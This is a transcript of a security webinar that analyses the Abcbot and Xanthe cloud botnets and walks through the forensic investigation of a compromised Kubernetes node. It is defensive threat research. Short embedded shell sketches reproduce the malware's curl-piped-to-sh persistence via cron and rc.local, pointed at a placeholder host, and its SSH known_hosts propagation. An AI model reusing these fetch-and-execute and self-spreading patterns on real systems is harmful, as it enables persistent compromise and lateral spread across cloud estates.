Thank you very much, and good afternoon everyone. My name is Al Carquhey, I'm a solutions engineer at Cado Security with about 20 years of cybersecurity experience from time in the Royal Air Force and leading incident response engagements at PwC UK. Hello everyone, I'm Matt Muir and I'm a threat intelligence researcher at Cado Security. Prior to working at Cado, I was a macOS malware researcher, and I've got a background in DevOps, digital forensics and operational cybersecurity. Great, thank you very much Matt. So to kick things off, I'll just walk through the agenda. During this webinar, Matt and I will talk about the challenges we've heard from cloud users about performing investigations of compromised cloud assets. Matt will provide a briefing on a threat actor group that has been targeting cloud assets for financial gain using cryptocurrency miners. I'll be walking through a Kubernetes compromise case study, and then we'll wrap up with the key takeaways and some questions and answers. I always think it's important to start off by talking about the challenge itself. Let's face it: performing an in-depth investigation in the cloud is an extremely complex and time-consuming process. According to recent research by ESG, organisations are four times as likely to say investigations and incident response are more difficult in cloud environments versus traditional on-premise environments. When asked about the leading challenges security teams faced when it came to performing cloud investigations, lack of visibility and context was the number one response. This has a lot to do with the ephemeral, dynamic nature of cloud resources, such as containers. Since we'll be talking about Kubernetes today, I thought it'd be an interesting stat to touch on that 50% of the survey respondents reported it would be simply impossible for them to investigate an incident that impacted their container environment.
So now I'd like to hand over to Matt for his briefing on the threat actor group that's been targeting cloud assets. Thanks Al. So as part of Cado Labs, Cado's threat research team, I'm regularly involved in conducting research into new software threats affecting cloud infrastructure. In this section I'm going to discuss an emerging malware family we've been tracking since the end of 2021 named Abcbot. As we'll see, Abcbot is a botnet that targets insecure cloud compute instances. Currently, it targets cloud service providers such as Alibaba and Huawei Cloud, but the techniques it uses for initial infection and propagation mean it could realistically target instances from any cloud service provider. To give a quick overview of Abcbot, the malware includes payloads consisting of shell scripts and ELF executables, with the shell scripts in particular displaying some notable capabilities. These capabilities include self-propagation in a worm-like fashion, using information about cloud security services and competing malware campaigns to disable competitors, and registration of persistence via common Linux persistence techniques. To provide some context around Abcbot, the campaign was originally reported in November 2021 by 360 Netlab. 360 Netlab focused their analysis on the ELF payloads used to connect the infected machine to the botnet. For this reason, we won't cover those today and will instead cover one of the installation shell scripts used to propagate the malware and download additional payloads. We believe this script reveals more about the attacker's capabilities and objectives, which we'll discuss further in the coming slides. Let's begin by taking a look at an interesting capability displayed by this malware family: the killing of competitors. One thing that is immediately clear from analysing this initialisation script is that the developers behind Abcbot are really invested in killing off competing miners.
The function that you can see on screen here is dedicated to removing artifacts of competing malware campaigns and mining software such as XMRig. The malware also searches for malicious Docker images and removes or kills them as appropriate. This suggests targeting of misconfigured Docker API endpoints, which is a common infection vector in cloud environments. Clearly, the Abcbot developers had invested significant time into researching cloud security threats, given the previous slide. However, the developers also demonstrated a knowledge of cloud security mechanisms, as the disabling of security services native to the targeted CSPs was also performed. This allows their malware to execute unimpeded, and also allows us as analysts to determine the targets of the campaign. For example, several lines were dedicated to killing processes associated with the Alibaba and Tencent cloud security agents, as we can see on screen here. Those with knowledge of malware research will know that persistence is a key objective for most malware samples. Abcbot is no different. Persistence for the Abcbot initialisation scripts was established via RC scripts and cron, which is common on Linux and Unix systems. Once registered, the persistent scripts periodically try to retrieve a copy of the current script and execute it on the fly by piping it through sh. Persistence ensures that the script is always running and is kept alive in the event that a user or another process on the system attempts to halt execution. Another key objective of most malware campaigns is to establish network connectivity to allow bidirectional communication with the attacker. This is known as command and control, or C2. In a function named iptables checker, the developer behind Abcbot configures the Linux iptables firewall to drop or accept traffic based on port numbers and source IP addresses. This particular function gave us some insights into the state of the campaign at the time of analysis.
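As a defanged sketch of the persistence technique just described (periodically re-fetch the current script and pipe it through sh), the following is illustrative only: the URL is a placeholder, and the cron entry is written to a local demo file rather than installed on the system.

```shell
#!/bin/sh
# Illustrative sketch of cron-based persistence as described in the talk.
# PAYLOAD_URL is a placeholder; real samples point at attacker infrastructure.
PAYLOAD_URL="http://example.invalid/update.sh"
CRON_FILE="./demo_crontab"   # a real sample would write to /etc/cron.d or a crontab

# Every 10 minutes, re-fetch the current script and pipe it through sh,
# keeping the malware alive even if its processes are killed.
echo "*/10 * * * * root curl -fsSL $PAYLOAD_URL | sh" > "$CRON_FILE"

cat "$CRON_FILE"
```

Defenders can hunt for exactly this pattern: cron entries that pipe remote content straight into a shell.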
For example, it is clear from this function that the malware is under active development, as the author has left commented code. In one of the commented rules, it appears as if the developer configured iptables to accept all ingress traffic from a mobile IP address. This was likely a command and control server under the attacker's control. Another commented rule drops ingress traffic on ports 2375 and 2376. These ports are typically associated with the Docker Engine API. We suspect this was added at one point to prevent attempts to halt execution of any malicious Docker containers the malware creates. A check is also done to see whether these rules are already in place but, as the rules are commented out, they are no longer added. Instead, a more generic rule is added to allow all ingress traffic to a non-standard port number of 26800. Interestingly, URLs embedded in the malware also made use of this port. Another notable technique of Abcbot was the ability to infect related hosts with a copy of itself. As we can see on the slide, the malware checks for the existence of root's SSH known_hosts file and a corresponding public key. If these files are found in root's .ssh directory, known hosts are enumerated and a copy of the installation script is run on each remote host. This ensures propagation of the malware in a worm-like fashion and could result in an organization's entire cloud estate being rapidly compromised. So now that we've covered some of the notable capabilities of Abcbot, let's discuss an unexpected finding that emerged during analysis of this campaign. When analyzing Abcbot, we were initially under the impression that we were analyzing a relatively new malware family. Continued analysis revealed that this malware had a longer history than we initially thought. Back in late 2020, Cisco's Talos security research team reported on an emerging cloud cryptojacking malware campaign that they named Xanthe.
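The worm-like spreading step just described can be sketched as follows. This is a defanged illustration: the host list is read from a local sample file standing in for root's known_hosts, the payload URL is a placeholder, and the propagation command is only printed, never executed.

```shell
#!/bin/sh
# Defanged sketch of SSH-based propagation via root's known_hosts.
# A real sample would run the installer over ssh; here we only print the command.
KNOWN_HOSTS="./known_hosts.sample"
PAYLOAD_URL="http://example.invalid/install.sh"

# Sample data standing in for /root/.ssh/known_hosts
printf '10.0.0.5 ssh-rsa AAAA...\n10.0.0.9 ssh-rsa AAAA...\n' > "$KNOWN_HOSTS"

# Enumerate previously contacted hosts and (would) re-run the installer on each.
cut -d' ' -f1 "$KNOWN_HOSTS" | while read -r host; do
    echo "would run: ssh $host 'curl -fsSL $PAYLOAD_URL | sh'"
done | tee propagate.log
```

Because known_hosts records every machine the root user has previously connected to, a single compromised node with a usable key can seed the rest of the estate.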
We discovered a link between Abcbot and Xanthe when conducting analysis on the infrastructure behind the Abcbot campaign. Additional comparison of the code used in samples from both campaigns confirmed our suspicions. Before discussing the similarities between these malware families, let's have a brief overview of Xanthe itself. Xanthe is a family of cryptojacking malware with the primary objective of hijacking system resources to mine the Monero cryptocurrency. In order to mine Monero on target systems, the common open-source miner XMRig is deployed. Xanthe also spreads via exposed Docker API endpoints, with an initialization script responsible for propagation, network scanning and downloading of additional payloads. Xanthe's additional payloads include an open-source library for hiding processes, a script to disable security services and kill competing miners, and the XMRig binary itself. This will probably sound familiar if you were paying attention to the previous section of this talk. Let's take a closer look at some of the signs that demonstrate these campaigns are linked. In the report published in late 2020, researchers from Talos commented on the coding style present in the Xanthe scripts they analyzed. They highlighted that in the samples analyzed, function declarations were located at the top of the script and function invocation was conducted at the bottom. Talos suggested this likely aids testing new iterations, with function calls commented or uncommented as necessary. Although this is a fairly tenuous link, it's interesting to note that samples from both the Abcbot and Xanthe campaigns follow this convention. Diving deeper into the samples themselves, we see several of the functions in Xanthe have identical names to those in Abcbot. Some of the functions also have the string "go" appended to the end of their names. This is another convention observed in both campaigns.
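The declarations-at-top, invocations-at-bottom layout that Talos described, together with the "go" suffix naming convention, looks roughly like this. The function names and bodies here are stand-ins, not the actual names from the samples.

```shell
#!/bin/sh
# Sketch of the script layout convention shared by both campaigns:
# all functions are declared first, then invoked in a block at the bottom,
# making it easy to comment individual calls in and out while testing.
# Function names below are illustrative stand-ins only.

nameservercheckgo() { echo "check DNS config"; }
croncheckgo()       { echo "register cron persistence"; }
onego()             { echo "download additional payloads"; }

# Invocation block: individual stages can be toggled by commenting lines here.
{
nameservercheckgo
croncheckgo
# onego   # disabled during testing, as Talos suggested
} | tee convention.log
```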
We identified five functions with identical naming that you can see on the slide here. Subsequent analysis of each of these functions was performed to determine whether they were semantically equivalent. The first function we encountered that appeared in both campaigns was called name server check. This function is responsible for configuring the target system to allow DNS requests to be made to the internet. It achieves this by checking whether the IP for Google or Cloudflare's public DNS server is present in the /etc/resolv.conf file. If it isn't, the script then adds it. The Abcbot version of this function is much larger than the Xanthe equivalent and has additional functionality. This suggests that Abcbot is an iteration of Xanthe, which also makes sense given it was discovered a year later. More importantly, the lines dedicated to configuring DNS are identical between both campaigns, as can be seen in the screenshot on this slide. As I mentioned before, persistence is a key goal of most malware campaigns. Given this, it's unsurprising that the function on screen was present in both Abcbot and Xanthe. As the name suggests, this function is responsible for achieving persistence via cron, the task scheduler which is present in virtually all Linux distributions. Since cron is pretty much ubiquitous, this is a common method of persistence on Linux systems, so isn't necessarily notable in itself. However, analysis of this function revealed further links between the Abcbot and Xanthe campaigns. One example of this was the presence of a comment from the developer regarding additional logic to determine whether cron was running. This line appeared in samples analyzed from both campaigns, and the wording was identical. The lines of the cron entry itself are also of interest. Part of the cron entry consists of a curl command with a defined user agent string. The string used in both Xanthe and Abcbot samples can be seen highlighted in the screenshot.
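The name server check logic behaves roughly like this sketch. It operates on a local copy of a resolv.conf file so it can run without root; a real sample edits /etc/resolv.conf directly.

```shell
#!/bin/sh
# Sketch of the name-server-check logic shared by both campaigns:
# ensure a public DNS resolver is present so payload domains resolve.
RESOLV="./resolv.conf.sample"   # stand-in for /etc/resolv.conf
echo "search example.internal" > "$RESOLV"

# Add Google's public resolver only if no known-good resolver is present.
if ! grep -qE '8\.8\.8\.8|1\.1\.1\.1' "$RESOLV"; then
    echo "nameserver 8.8.8.8" >> "$RESOLV"
fi
cat "$RESOLV"
```

This step matters to the attacker because a restrictive or broken internal resolver would otherwise prevent the script from fetching its additional payloads by domain name.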
Interestingly, one of the payloads downloaded by the malware also used this string as its name. Existence of a unique string such as this between the two campaigns seems more than coincidental, and suggests that server-side code from both campaigns expects this string to be present in the user agent. Similar to the previous slide, this was another function responsible for registration of persistence, except this time via RC scripts. RC scripts allow code to be run at boot or login and, similar to cron, are particularly useful for malware persistence. This is another common technique, although perhaps less so than cron. Looking at the code within this function, again we noticed identical commenting between both samples. The functionality of check RC is similar to cron check go. Persistence is achieved by writing shell commands to rc.local, which is one of the RC script files. The shell commands are used to invoke the curl data transfer utility with a unique user agent string. This downloads a copy of the current script and pipes it through sh to ensure it's kept running. Version numbers are also appended to the user agent string, suggesting iteration of the sample. Similarly, the lines responsible for creating the RC script are virtually identical across both campaigns. At this point in the analysis, we noted that the structure of the code, wording of TODO comments, wording of log statements and several lines of code were identical in samples of both Abcbot and Xanthe. I mentioned previously that Abcbot downloads additional payloads to connect it to a botnet. The one go function is responsible for downloading these payloads and performing additional configuration of the target system. There were more differences observed in the Abcbot versus Xanthe versions of this function than any of the others. Some lines are identical, however. In Xanthe, the developer configures the huge pages feature via modification of the appropriate kernel parameter.
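The rc.local persistence step just described can be sketched like this. It is illustrative only: the path, URL and user agent string are placeholders, and the entry is written to a local demo file rather than to /etc/rc.local.

```shell
#!/bin/sh
# Sketch of check-RC-style persistence: append a fetch-and-execute line
# to rc.local so the script is re-run at boot. Paths, URL and UA are placeholders.
RC_LOCAL="./rc.local.sample"    # a real sample writes to /etc/rc.local
PAYLOAD_URL="http://example.invalid/install.sh"
UA="update-v1.2"                # unique user agent, with a version number appended

# Only append the entry if it is not already registered.
touch "$RC_LOCAL"
if ! grep -q "$PAYLOAD_URL" "$RC_LOCAL"; then
    echo "curl -fsSL -A '$UA' $PAYLOAD_URL | sh" >> "$RC_LOCAL"
fi
cat "$RC_LOCAL"
```

The distinctive user agent both identifies the client to the attacker's server and, as noted above, gives defenders a high-fidelity string to hunt for.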
This likely facilitates cryptocurrency mining by configuring the system to support memory pages greater than the default. In Abcbot, we see these lines commented out. This, combined with prior analysis of payloads downloaded by this function, suggests that the objective has changed from cryptojacking in Xanthe to more traditional botnet activity in Abcbot. Despite this, it's worth noting that the semantics of the two versions of this function are similar. Processes are enumerated to check whether the machine has already been compromised by Abcbot or Xanthe. If malicious processes are found, this is logged. If not, the process is launched as necessary. So hopefully we've illustrated the similarities between certain functions found in both of these malware campaigns. At this point in our analysis, we were fairly convinced that these samples were linked. However, there are some additional findings to note. We mentioned that propagation via enumeration of known hosts was a notable capability of Abcbot. This exact same technique was used in the samples of Xanthe we analysed. Examples of the code responsible for this can be seen on the slide. In Abcbot, a number of malicious users were added to the system to facilitate a backdoor. The usernames added to the system were identical in samples from both campaigns. While this could be an attempt by one threat actor to copy another, we believe that our prior findings indicate that this is more than coincidental. Moving on now to our final and most important finding. Although each of the similarities we've discussed was enough to give us reasonable suspicion that these campaigns were linked, we needed one final piece of evidence to conclusively link them. We already discussed the function from Abcbot named iptables checker, which was responsible for configuring iptables to allow ingress traffic on a non-standard port. An incredibly similar version of this function was also found in the Xanthe samples we analysed.
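The launch check described above (enumerate processes, log if already infected, otherwise start the payload) can be sketched as follows. The process name is a harmless stand-in that will not match anything running, and pgrep is used in place of the samples' own enumeration logic.

```shell
#!/bin/sh
# Sketch of the launch check: enumerate processes and only start the
# payload if it is not already running. The name below is a stand-in
# that is deliberately not a real process, so this is safe to run.
PAYLOAD_NAME="abcbot_demo_proc"

# The older campaign also enabled huge pages to aid mining, roughly:
#   sysctl -w vm.nr_hugepages=128   (requires root; shown for illustration)

if pgrep -x "$PAYLOAD_NAME" > /dev/null 2>&1; then
    msg="already running, nothing to do"    # existing infection is logged
else
    msg="launching payload"                 # here a real sample would exec it
fi
echo "$msg" | tee launch.log
```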
Not only that, but rules used within this function to allow traffic from a C2 server included the same IP address in both Xanthe and Abcbot. This constitutes an overlap of infrastructure. The server at that IP address would have to be under the control of the developer behind both Abcbot and Xanthe for it to be usefully included in this script. Of course, they're unlikely to include it if it wasn't part of their own infrastructure. We believe that this is the strongest indicator yet that these campaigns are linked and the same threat actor is responsible. So to summarise, the Abcbot and Xanthe campaigns show the sophistication of malware developers in the cloud security space. Although code reuse is common in malware, we've highlighted overlapping infrastructure and identified reuse of unique strings, which would be difficult or pointless for someone else to copy. If the same threat actor is behind these campaigns, we believe this indicates a shift away from cryptocurrency mining, a common objective of cloud malware, towards potentially more destructive botnet activities. I'll hand you back to Al now for a case study on another attack with similar TTPs, except this time targeting Kubernetes clusters. Thanks Matt. So yes, in this case study, I'll be walking through an investigation of a compromised Kubernetes node, which ultimately resulted in the attacker gaining access to the AWS console. The case study used the tactics, techniques and procedures of a threat actor group focused on compromising containers or the systems they run on. So here we have an overview of the setup that was deployed and compromised. At the centre of it all is an EKS cluster with three nodes running a simple application. The nodes were configured with the Kubernetes control plane API exposed to the internet.
In addition to the cluster, AWS GuardDuty and CloudWatch were enabled to provide external logging and monitoring capabilities, along with a deployment of our Cado Response platform, which we use for data capture and processing. With organisations moving services to container-based cloud systems, and as you've heard from Matt's coverage of Abcbot, threat actors are actively looking for exposed and poorly configured Docker or Kubernetes APIs to exploit. Once exploitation is achieved, threat actors will look to complete their immediate objective of deploying a coin miner, and then look for further systems to compromise, whether those are local or reached via command and control (C2) from internet-based systems. So what's the worst that could happen? Well, typically, and as Matt's mentioned already, most of the time it's boring coin mining. But you could go further than deploying applications like XMRig. For example, a threat actor could exploit their access to perform data exfiltration, which could be part of a ransomware attack, or utilise user accounts on compromised systems for lateral movement. If they were able to break out of the container environment, this could lead to an attacker being able to spin up or destroy other containers, or worse, expand their access to the cloud infrastructure level itself. From there, they could modify and create cloud user accounts and use this access to reach or observe other resources or areas of the cloud environment where key or sensitive data may be stored. So now that we've covered the setup and environment and what threat actors can do, let's move on to how we performed the investigation. A critical component of any investigation is data.
If you don't have access to all the necessary data sources, and the ability to process and analyse that data, then you're not likely to be able to confirm threat actor actions, or you are likely to miss their activity altogether. Here we show the data sources that we used during the investigation, and we'll have some examples of them as we go through the presentation. Looking first at the value cloud provider logs can provide: CloudTrail can give you an audit of what's happening within your account, for example a new user account being created, or the IP address associated with a console logon. CloudWatch can provide you with system usage telemetry, which can be used to identify abnormal system activity such as high CPU or memory usage, both of which are good indicators of the heavy workloads associated with crypto mining. From a network telemetry perspective, VPC flow logs can show abnormal network connections made from the systems themselves. This can be tied into GuardDuty logs, AWS's threat detection service, to show connections that may be associated with Tor exit nodes. So here we have an example of the VPC flow logs, which have been processed using the Cado Response platform. The top section shows a network connection to an IP address which, when you look it up, resolves back to Pastebin. We've seen Pastebin being used to host malicious scripts, and it's a common mechanism for distributing that code to compromised systems. The bottom section shows SSH network traffic from attacker systems to the Kubernetes node itself. One thing to note here: the VPC flow logs don't necessarily appear in order of network connection establishment. So, for example, the first event shows the network connection flow from Pastebin to the node, and the second event shows the flow from the node to Pastebin.
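Triage of VPC flow logs like the ones just described can be sketched as follows. The records here are fabricated sample data in the default flow log field order, and the filter simply pulls out accepted flows targeting SSH on port 22.

```shell
#!/bin/sh
# Sketch of triaging VPC flow logs for inbound SSH (dstport 22) records.
# Default-format fields: version account-id interface-id srcaddr dstaddr
# srcport dstport protocol packets bytes start end action log-status
cat > flowlogs.sample <<'EOF'
2 123456789012 eni-0a1b 203.0.113.50 10.0.1.20 51522 22 6 12 2934 1670000000 1670000060 ACCEPT OK
2 123456789012 eni-0a1b 10.0.1.20 198.51.100.7 44410 443 6 30 6112 1670000100 1670000160 ACCEPT OK
EOF

# Print source -> destination for any accepted flow targeting port 22.
awk '$7 == 22 && $13 == "ACCEPT" { print $4, "->", $5 }' flowlogs.sample | tee ssh_flows.log
```

The same one-liner pattern extends to other suspicious ports, such as the Docker Engine API ports mentioned earlier in the talk.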
You would expect it to be the other way around, as it was the node itself that initiated the connection to Pastebin. Next, the benefits you can get from disk-based analysis. Having access to the full disk allows analysts to run additional detection or investigation tools, which can then help identify malicious files or threat actor activity. One of the main benefits is that you have access to the file contents themselves, and as you go through your investigation, you can look into the contents of those files. If you don't do that collection in the first place, you'll end up having to do repeated multiple collections from the target system. Having access to that data can also allow analysts to identify potentially staged data for exfiltration, as well as historical data such as user command line activity. In this example, where we processed the disk image of the Kubernetes node, we can see a log entry for a successful SSH connection, where the attacker was able to access the node using the root user account. From this point, as the investigation expanded, we reviewed the contents of the authorized_keys file in the root user's .ssh folder, and from there we found an unknown SSH key had been added to that file. Looking now at memory analysis: memory analysis can provide visibility of runtime information and can show details of what processes were running, including some of the command line arguments. An analyst can use this information to establish what libraries and drivers were loaded for each of the processes, and it can also aid with the identification of rogue processes or code injection. Along with process details, memory analysis can provide network connection information associated with those processes, command line history that hasn't yet been written to disk, and files that a particular process has been accessing.
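The disk triage steps just described (find the successful root SSH login, then review root's authorized_keys) can be sketched like this. The evidence tree, log lines and key are all fabricated sample data; in practice the path would be wherever the captured disk image is mounted.

```shell
#!/bin/sh
# Sketch of disk-based triage against a mounted image: find successful
# root SSH logins in auth.log, then review root's authorized_keys.
# "./evidence" stands in for the disk image mount point; data is mocked.
MOUNT="./evidence"
mkdir -p "$MOUNT/var/log" "$MOUNT/root/.ssh"
cat > "$MOUNT/var/log/auth.log" <<'EOF'
Dec  6 10:02:11 node1 sshd[812]: Accepted publickey for root from 203.0.113.50 port 51522 ssh2
Dec  6 10:05:40 node1 sshd[901]: Failed password for ubuntu from 198.51.100.7 port 40022 ssh2
EOF
echo "ssh-rsa AAAAB3... attacker@unknown" > "$MOUNT/root/.ssh/authorized_keys"

# Successful root logins, then the key material behind them.
grep 'Accepted .* for root' "$MOUNT/var/log/auth.log"
# Any key here that the admin team cannot account for is a likely backdoor:
cat "$MOUNT/root/.ssh/authorized_keys"
```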
Memory analysis also provides the analyst with the ability to extract files and process executables from the capture, which can then be further analysed using additional tools, and may lead to additional indicators useful for identifying other affected assets. Additional context around processes, such as timestamps, and especially around the network, can help with understanding the order of activity that's taken place. Some things to note about memory capture and analysis: the capture itself is from a moment in time, so you may not find as much historical threat activity as you'd think. Look out for false positives from things like AV signatures if the system is running antivirus software. It can also be tricky to perform the capture and analysis of memory from cloud-based systems, so be careful that you don't tax the environment too much. Analysing network connections highlighted suspicious traffic when we looked at this capture. Here we have an aptly named process called ncat, and it has a connection to an unknown remote IP address. Looking for additional processes with connections to that same IP address, we identified that a bash process also showed the same network connection information. When we look at the process listing, we can see that the ncat and bash processes have the same start time. On systems that are running containers, each of those container processes will have its own containerd-shim parent process. Expanding these, we find that our suspicious bash process is also a child process of the aptly named ncat, which is running in a container that's also running an NGINX process. So when we pull all this information together, we can see a lot more of the picture. Using each of the data sources, we've mapped out where we identified threat activity. No single source of information showed the full picture.
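The correlation step described above (flag processes sharing a start time with the process holding the suspicious connection) can be sketched like this. The process listing is fabricated sample data standing in for output from a memory analysis tool.

```shell
#!/bin/sh
# Sketch of the memory-analysis correlation step: given process records
# (pid, ppid, start time, name), flag processes sharing a start time with
# the process that holds a suspicious network connection. Data is mocked.
cat > pslist.sample <<'EOF'
1401 1320 10:02:13 containerd-shim
1422 1401 10:02:14 nginx
1760 1401 10:07:02 ncat
1761 1760 10:07:02 bash
EOF

SUSPECT_START="10:07:02"   # start time of the ncat process with the odd C2 IP
awk -v t="$SUSPECT_START" '$3 == t { printf "%s (pid %s)\n", $4, $1 }' pslist.sample | tee correlated.log
```

In this mocked listing, the shared start time surfaces both ncat and its child bash, mirroring the parent-child relationship found in the real capture.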
Looking at this in totality enables analysts to confidently answer questions such as what happened, when did it happen, and how did it happen. When we pull this information together in a combined timeline, you can see network connections by the attacker onto the node itself. These were followed by attempted connections to a URL associated with crypto mining, followed by a Kubernetes API audit log entry showing the launch of an XMRig container, and finally the creation of an AWS account, and then that account being assigned the IAM full access policy. In this example, we've assessed that the attacker's intent is more financially motivated, with the distribution and execution of the XMRig coin miner. However, their additional access could potentially lead to greater problems, with that extra account having been created with the full access IAM policy. That could then allow them access to additional areas of the cloud platform, and give them unauthorised access to data. So, some key takeaways. Organisations are moving their operations and capabilities to the cloud. Threat actors have already been operating in cloud-based systems, and they are adept at exploiting their knowledge and experience of them to achieve their objectives. As mentioned in Matt's review of the Abcbot threat actor group, and demonstrated in this case study, API endpoints are actively being sought out and, if poorly configured, could lead to the exploitation and compromise of a node and potentially further systems and resources. Setting up automation is key to being able to perform Kubernetes investigations. You must be quick to capture all the data necessary for a full investigation; if not, you're going to lose some of it, and you'll not be able to carry out a complete and effective investigation. Utilise the full potential of monitoring, not only from your systems themselves but also from your cloud providers.
Combining traditional triage, disk and memory data will provide security teams with the means to answer those key questions of what happened, when did it happen, and how did it happen. So, thank you for your time this afternoon, and I'll pause here now for a minute to let anyone post any questions they have into the Q&A box. First question: there have been many recent malware botnets that have specifically targeted Chinese cloud providers. Why do you think this happens? Matt, I think this is a good one for you. So yeah, we're not entirely sure why this is the case, but if I were to guess, I'd say that many of these CSPs are newer than, for example, AWS or some of the other bigger cloud providers. Their security controls are not as mature as those of the larger CSPs, which makes compute instances running under them an easier target for attackers. We've also got another question: how is access gained to install the RC scripts? Yeah, I can probably take that as well. This is a really good question, because it's not completely clear. A lot of the campaigns we're looking at were historical, so identifying the initial infection vector is pretty difficult. But we believe the malware spread via exposed Docker Engine API endpoints, so it seems likely that remote commands are sent to the server, with Docker potentially running as root, post compromise. These commands can be used to download the initialization shell scripts, or to attempt to escape the container and run those commands on the box itself. Right. Next question: investigating a potentially compromised container is a huge blind spot for us. So when you say automation, what does that actually mean? Automating your investigation should cover all your data sources. If you have the ability to utilise capabilities like SOAR platforms, you can create playbooks which could be triggered from a high-fidelity alert.
You can then use that to automatically capture, or initiate the capture of, your data, bring it into a central place, get it processed, and have it accessible to the entire security team. That allows the analysts to concentrate on working the investigation itself, rather than worrying about what data needs to be captured and where it's going to be stored. Next question: what Kubernetes information or forensic opportunity might be lost if not actively managed and collected? One thing that we've seen with regard to containers is that, due to their nature, they can be easily spun up and just as easily destroyed and torn down. Unfortunately, it's that aspect of being torn down that makes collecting information from them a problem. Okay. Thank you everyone for your time this afternoon. We'll follow up by email with any of the questions that were not answered, but now I'll hand back to Marissa from the Linux Foundation. Wonderful. Thank you so much Al and Matt for your time today, and thank you everyone for joining us. Just a quick reminder that this recording will be up on the Linux Foundation's YouTube page later today. We hope you will join us for future webinars, and have a wonderful day. Thank you.